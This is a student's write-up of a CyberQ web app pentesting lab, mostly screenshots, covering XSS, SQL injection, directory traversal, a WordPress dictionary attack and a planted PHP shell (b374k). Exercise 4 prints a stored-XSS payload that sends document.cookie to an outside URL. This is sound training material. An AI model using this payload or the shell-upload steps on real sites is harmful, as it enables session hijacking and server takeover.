Module 8 - Web App Pentesting - Chrono's Cyber Chronicles

| Title | Author | Created | Published | Tags | | ----------------------------- | ---------------------------- | ------------- | ------------- | ---------------------------------------------------------------------------------------------------------------------------------- | | Module 8 - Web App Pentesting | <ul><li>Jon Marien</li></ul> | July 13, 2025 | July 13, 2025 | [[#skillsontario\|#skillsontario]], [[#competitions\|#competitions]], [[#certifications\|#certifications]], [[#classes\|#classes]] | # Task - Lab 8 ## **CyberQ Module 8 Lab** 1) Capture all flags. 2) Complete the following exercises: - Exercise 1: Gathering Information About a Target Using WhatWeb - Exercise 2: Web Application Vulnerability Assessment Using Vega - Exercise 3: Pentesting Identified Web Applications Vulnerabilities - Exercise 4: Pentesting Web Application for Stored XSS and Parameter Manipulation Vulnerabilities - Exercise 5: Exploiting Directory Traversal Vulnerability in WordPress Application - Exercise 6: Performing Dictionary Attack on a WordPress Web Application using Burp Suite - Exercise 7: Exploiting WordPress Web Application Vulnerability by Uploading a Customized Shell - Exercise 8: Directory Browsing a WordPress Website using DirBuster and Accessing Shell ## **Output/Report** 1) Screenshot of finished lab score. 2) Screen captures of the following steps from the CyberQ Lab Instructions document. - Exercise 1: Gathering Information About a Target Using WhatWeb (Step: 7) - Exercise 2: Web Application Vulnerability Assessment Using Vega (Step: 8) - Exercise 3: Pentesting Identified Web Applications Vulnerabilities (Step: 24) - Exercise 4: Pentesting Web Application for Stored XSS and Parameter Manipulation Vulnerabilities (Step: 27) - Exercise 5: Exploiting Directory Traversal Vulnerability in WordPress Application (Steps: 9, 15) - Exercise 6: Performing Dictionary Attack on a WordPress Web Application using Burp Suite (Steps: 8, 22, 32, 37) - Exercise 7: Exploiting WordPress Web Application Vulnerability by Uploading a Customized Shell (Steps: 8, 12) - Exercise 8: Directory Browsing a WordPress Website using DirBuster and Accessing Shell (Step 11) Use the Lab Guide for preparing the report. --- # Module 08: Web Application Penetration Testing Methodology ## Objective The objective of this lab is to provide expert knowledge of web application vulnerabilities and web applications attacks such as: - SQL Injection - Parameter tampering - Cross-Site Scripting (XSS) - Dictionary Attacks - Shell Upload - Directory Traversal ## Scenario A web application is an application that is accessed by users over a network such as the Internet or an intranet. The term may also mean a computer software application that is coded in a browser-supported programming language (such as JavaScript, combined with a browser-rendered markup language like HTML) and reliant on a common web browser to render the application executable. Web applications are popular due to the ubiquity of web browsers, and the convenience of using a web browser as a client. The ability to update and maintain web applications without distributing and installing software on potentially thousands of client computers is a key reason for their popularity, as is the inherent support for cross-platform compatibility. Common web applications include webmail, online retail sales, online auctions, wikis and many other functions. Web hacking refers to exploitation of applications via HTTP which can be done by manipulating the application via its graphical web interface, tampering the Uniform Resource Identifier (URI) or tampering HTTP elements not contained in the URI. Methods that can be used to hack web applications are SQL Injection attacks, Cross Site Scripting (XSS), Cross Site Request Forgeries (CSRF), Insecure Communications, etc. As an expert _Penetration Tester_ and _Security Administrator_, you need to test web applications for cross-site scripting vulnerabilities, cookie hijacking, command injection attacks, file upload vulnerabilities, etc. and secure web applications from such attacks. --- # Exercise 1: Gathering Information About a Target Using WhatWeb ## Scenario WhatWeb identifies websites. It recognises web technologies including content management systems (CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web servers, and embedded devices. WhatWeb identifies version numbers, email addresses, account IDs, web framework modules, SQL errors, and more. The objective of this lab is to help students learn how to: - Identify the target website technologies - Perform aggressive scans - Log output in an xml format --- ##### *Required: Step - 7* ![[{DABB0F38-0ADF-4D5D-A427-947E825AD9F9}.png]] ![[{34858C5C-2109-43E8-9910-BE56732B2A5D}.png]] ###### **STEP 7:** ![[{D5B40F0D-9670-4355-9FDC-09C6F323D138}.png]] > [!answer]- > ![[{0C8FCB2C-F318-4302-AEE6-9276362E5A68}.png]] --- # Exercise 2: Web Application Vulnerability Assessment Using Vega ## Scenario Vega is a free and open source scanner and testing platform to test the security of web applications. Vega can help to find and validate SQL Injection, Cross-Site Scripting (XSS), inadvertently disclosed sensitive information and other vulnerabilities. It is written in Java, GUI based and runs on Linux, OS X, and Windows. Vega includes an automated scanner for quick tests and an intercepting proxy for tactical inspection. The Vega scanner finds XSS, SQL injection, and other vulnerabilities. Vega can be extended using a powerful API in the language of the web: Javascript. The objective of this lab is to help students to learn how to: - Use Vega and perform Web Application Vulnerability Assessment - Generate reports and examine them --- ##### *Required: Step - 8* ###### **STEP 8:** ![[{153ECFD3-7930-4067-8BD5-715D6538DFC3}.png]] --- # Exercise 3: Pentesting Identified Web Applications Vulnerabilities ## Scenario In the previous lab exercise, you have performed web application vulnerability analysis using Vega. In that exercise, the web app scanner discovered two major vulnerabilities - XSS and SQL Injection. When attackers identify such vulnerabilities, they gain access to sensitive information, leading to the data breach. As a Penetration Tester, you should have knowledge of how to pentest these vulnerabilities and extract sensitive data. In this lab, you will learn how to: - Pentest a cross-site scripting vulnerability using java script - Pentest a SQL injection vulnerability using sqlmap --- ##### *Required: Step - 24* ![[{20296D00-F8CD-4D9E-B622-0785D664E9EB}.png]] ![[{4655F33C-E774-4BFB-BCC4-0B02F2A56EED}.png]] Took a few tries, but got it in the end: ![[{55B6E9AF-D380-49C0-B2F8-911932AA7039}.png]] ![[{351B899B-D1B3-480B-AA94-4C05423B585B}.png]] ![[{04E50601-8797-4979-9BDD-E2785E50C182}.png]] ![[{D2C08125-C003-4D1C-8D16-12BCD665D1E2}.png]] ![[{BEFA98A4-27D1-438C-B975-80E7DCDE608B}.png]] ![[{775B38C1-C58C-46B6-B85F-F36B29E2560F}.png]] ###### **STEP 24:** ![[{ABA36745-FAAC-42B9-992D-C523E62121B3}.png]] ![[{5BB2B804-854F-4F89-8D9B-FB2888286AB5}.png]] --- # Exercise 4: Pentesting Web Application for Stored XSS and Parameter Manipulation Vulnerabilities ## Scenario Stored attacks are those where the injected script is permanently stored on the target servers, such as in a database, in a message forum, visitor log, comment field, etc. The victim then retrieves the malicious script from the server when it requests the stored information. Stored Cross-Site scripting attacks are persistent attacks which are implanted on the target server unless its existence is detected and removed. When an employee in an organization unknowingly becomes victim to this script, attackers gain the session ID corresponding to the victim, and thereby attaining the victim's session without legitimately logging in to the web application. As an Ethical hacker or a Penetration Tester, you need to safeguard a website from executing such malicious scripts and thereby protect the user sessions from being stolen. The objective of this lab is to help students learn how to: - Test web applications for vulnerabilities - Use Firebug to hijack a session --- ##### *Required: Step - 27* `<a onclick="document.location='http://www.oceanplaza.com/Default.aspx?cookie='+escape(document.cookie);" href="#"> Please click here to visit website </a>` This part (Step 6-7) broke for me: ![[{B0AECDF8-09DA-4926-B8D9-B9A458040CFB}.png]] ###### **STEP 27:** ![[{CF1D943C-9712-4D31-A1E8-26E5C69338BE}.png]] > [!answer]- > ![[{AA41220C-0133-437B-9097-21193C98CD19}.png]] --- # Exercise 5: Exploiting Directory Traversal Vulnerability in WordPress Application ## Scenario Directory traversal allows attackers to access restricted directories including application source code, configuration, and critical system files, and execute commands outside of the webserver's root directory. Attackers usually manipulate variables that reference files with “dot-dot-slash (../)” sequences and its variations to access these restricted directories. As a penetration tester, you need to be aware of how to identify directory traversal vulnerability and pentest it, to gain access to sensitive information. In this lab, you will learn how to: - Enumerate WordPress plugins using wpscan - Identify vulnerabilities using SearchSploit - Exploit the vulnerability to download sensitive files --- ##### *Required: Steps - 9, 15* ![[{DDBD011A-1BF9-4067-8D2E-BBD23390D619}.png]] ![[{9BE4E778-20CE-4BA2-AA6E-CD349401C627}.png]] ![[{F734DE72-992E-4A00-94B5-868E246B0542}.png]] ![[{1D5EC0F9-72B4-4925-A867-0576358533C8}.png]] ###### **STEP 9:** ![[{2D5DE803-F54B-43F8-8544-E6C57C3E317C}.png]] ![[{2C45A423-2A11-4A11-91DE-0586BF68949B}.png]] ###### **STEP 15:** ![[{87F32CFD-58DD-40FF-97FD-E5B57D768F75}.png]] > [!answer]- > ![[{D31FD2C9-9C9F-4AA3-ABD6-5B3073630564}.png]] --- # Exercise 6: Performing Dictionary Attack on a WordPress Web Application using Burp Suite ## Scenario Using weak username/password combinations to log in to web applications might allow attackers to brute-force them and gain access to them. This leads to unrestricted access to user accounts and manipulation of data in those accounts. As a penetration tester, you should be able to identify weak username-password combinations in web applications. In this lab, you are going to learn how to perform a dictionary attack on WordPress web application using Burp Suite. --- ##### *Required Steps - 8, 22, 32, 37* ![[{1CB7CB67-166E-42F6-9644-180350C8F1A8}.png]] ###### **STEP 8:** ![[{F89CA164-8583-4E43-BF8F-A141A485FC4A}.png]] ###### **STEP 22:** ![[{A2E7926E-7B0A-401B-95EC-FF473A7F3645}.png]] ![[{90EB5CF7-295A-4C31-88E6-5B9E1CA1F650}.png]] ![[{B9F8FB91-595F-4189-9BFF-3CFA60DE1AFC}.png]] ###### **STEP 32:** ![[{437AD1CF-79BD-49FA-89EA-16AD7568DF6C}-2.png]] ![[{BA99339E-70F2-4BCE-8FF4-E69FAB41F06B}.png]] ###### **STEP 37:** Now we try the `user:pass` combo: ![[{EE72C949-4D32-416E-8F88-58C745386533}.png]] > [!answer]- > ![[{009B1722-1350-435C-A63B-A5E65201D0D2}.png]] --- # Exercise 7: Exploiting WordPress Web Application Vulnerability by Uploading a Customized Shell ## Scenario Some older versions of WordPress web application provide an option for the admin user to edit the footer, archive.php and 404.php files. If the admin employs weak user credentials to log in, and if an attacker is able to crack those credentials, there is a chance for the attacker to break into the account, upload a shell and gain access to the entire server hosting the web application. As a penetration tester, you need to know how to create a customized php shell and identify the entry points where you can upload it. This lab is a continuation of the previous lab exercise. In this lab, you are going to learn how to: - Create a customized php shell - Identify the entry point and insert the shellcode in it, to gain access to the server --- ##### *Required: Steps - 8, 12* ![[{1E76586C-3FE4-4873-8E40-0C8292685411}.png]] ###### **STEP 8:** ![[{81FF2486-9C21-4CDA-95D2-8A19F757CAC1}.png]] ![[{A9F48313-A3F5-4B9F-9532-7A20176FD8E4}.png]] We paste this new "theme" in the 404 Template: ![[{93ECCA06-E053-441D-98E3-9977B7FD7663}.png]] ###### **STEP 12:** ![[{D317FCBD-7792-4A85-BCB1-86FF66A2762C}.png]] Make sure to UPDATE THE FILE! ![[{9FC1CE78-882D-48CF-A7BA-DEE750891FEC}.png]] --- # Exercise 8: Directory Browsing a WordPress Website using DirBuster and Accessing Shell ## Scenario This lab is a continuation of the previous lab exercise. In the previous lab exercise, you have learned how to create a shell and upload it. It is essential for a pentester to determine the directory structure of a web application in order to browse them and find out if there are any unnecessary/sensitive folders that are browsable. In this lab, you are going to learn how to browse directories using dirbuster, determine the location of the shell (uploaded in the previous lab exercise), browse it and gain access to the server. --- ##### *Required: Step - 11* Start `dirbuster` with these settings: ![[{D599B89D-AB8D-48C6-9F03-0D3FD75D94CB}.png]] ![[{17C54BFC-511C-4C63-AF3E-7101C3E826C3}.png]] ![[{C2A39A05-E9A9-49AD-B6D0-5A0F0D3C989A}.png]] ![[{FA64D6BB-A8F7-4D62-80EE-EED60F789506}.png]] ###### **STEP 11:** `b374k sh` is successful! ![[{F77E76E3-4786-4B69-961E-3F229359E878}.png]] > [!answer]- > ![[{E3F34823-7595-486C-A08E-8B80DBCD6062}.png]] --- All done!